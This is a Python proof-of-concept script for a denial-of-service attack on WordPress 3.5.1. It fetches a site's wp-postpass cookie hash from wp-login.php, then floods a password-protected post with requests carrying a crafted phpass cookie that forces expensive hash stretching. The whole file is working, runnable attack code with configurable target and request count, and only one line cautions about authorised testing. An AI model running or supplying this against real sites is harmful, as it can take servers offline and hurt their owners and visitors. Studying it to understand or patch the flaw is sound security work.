# Proof of Concept
# WordPress 3.5.1
# Denial of Service
# Author: vnd at vndh.net
import httplib
import re
import sys
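def _extract_cookie_hash(set_cookie):
    """Return the 32-hex-digit suffix of a ``wp-postpass_<hash>`` cookie name in *set_cookie*."""
    # httplib folds repeated Set-Cookie headers into one comma-separated
    # string, so a plain search over the whole value is sufficient.
    match = re.search(r'wp-postpass_([0-9a-f]{32})', set_cookie)
    if match is None:
        raise RuntimeError('cannot fetch cookie hash')
    return match.group(1)


def get_cookie_hash(hostname, wplogin):
    """Learn the target's per-site cookie hash by provoking a ``wp-postpass`` cookie.

    Sends ``action=postpass&post_password=none`` to the login endpoint; the
    server answers with a ``Set-Cookie: wp-postpass_<hash>=...`` header, and the
    32 hex characters after ``wp-postpass_`` are what later requests need to
    address the right cookie.  The posted password is deliberately bogus --
    only the cookie *name* is of interest, never its value.

    Args:
        hostname: host (or ``host:port``) handed to ``httplib.HTTPConnection``;
            plain HTTP only.
        wplogin: path of the endpoint handling ``postpass`` (``/wp-login.php``).

    Returns:
        The 32-character lowercase hex string following ``wp-postpass_``.

    Raises:
        RuntimeError: if the response has no ``Set-Cookie`` header, or none
            carrying a ``wp-postpass_`` cookie.
        socket.error / httplib.HTTPException: propagated unchanged from the
            connection.
    """
    headers = {'Content-type': 'application/x-www-form-urlencoded'}
    handler = httplib.HTTPConnection(hostname)
    try:
        handler.request('POST', wplogin, 'action=postpass&post_password=none', headers=headers)
        response = handler.getresponse()
        # Only the headers matter; the body is never read.
        set_cookie = response.getheader('set-cookie')
    finally:
        # Release the socket even when getresponse() raises, instead of
        # leaving it to garbage collection.
        handler.close()
    if set_cookie is None:
        raise RuntimeError('cannot fetch set-cookie header')
    return _extract_cookie_hash(set_cookie)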
def send_request(hostname, post, cookie_name):
    """Fire one GET at *post* carrying a crafted ``wp-postpass_<cookie_name>`` cookie.

    The cookie value decodes to ``$P$Spaddding``.  NOTE(review): this is a
    phpass-format hash, and in phpass the character right after ``$P$`` encodes
    log2 of the stretching iteration count; ``S`` presumably selects a very
    large count, so the server burns CPU re-hashing for each request -- which
    looks like the denial-of-service vector this PoC exercises.  Confirm
    against the target's phpass implementation before relying on that reading.

    The response is intentionally never read and the connection is simply
    dropped when the function returns, so the caller does not wait on the
    slow server-side check.  Whether the server keeps processing after the
    client disconnects depends on its configuration.

    Args:
        hostname: host (or ``host:port``) for ``httplib.HTTPConnection``.
        post: path of a password-protected post (e.g. ``/?p=4``).
        cookie_name: the 32-hex-digit site hash appended to ``wp-postpass_``.
    """
    cookie_header = 'wp-postpass_' + cookie_name + '=%24P%24Spaddding'
    conn = httplib.HTTPConnection(hostname)
    conn.request(
        'GET',
        post,
        'action=postpass&post_password=asdf',
        {'Cookie': cookie_header},
    )
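if __name__ == '__main__':
    # Defaults reproduce the original PoC; each may be overridden positionally:
    #   python poc.py [hostname] [post_path] [request_count] [wplogin_path]
    # This script is built to degrade the target -- run it only against
    # systems you are explicitly authorised to test.
    hostname = sys.argv[1] if len(sys.argv) > 1 else 'wordpress.remote'
    posturl = sys.argv[2] if len(sys.argv) > 2 else '/?p=4'  # link to password protected post
    requests = int(sys.argv[3]) if len(sys.argv) > 3 else 1000
    wplogin = sys.argv[4] if len(sys.argv) > 4 else '/wp-login.php'

    # One round-trip to learn the site-specific cookie suffix, then the flood.
    cookie_hash = get_cookie_hash(hostname, wplogin)
    print('[+] received cookie hash: %s' % cookie_hash)
    for i in xrange(requests):
        print('[+] sending request %d...' % (i + 1))
        send_request(hostname, posturl, cookie_hash)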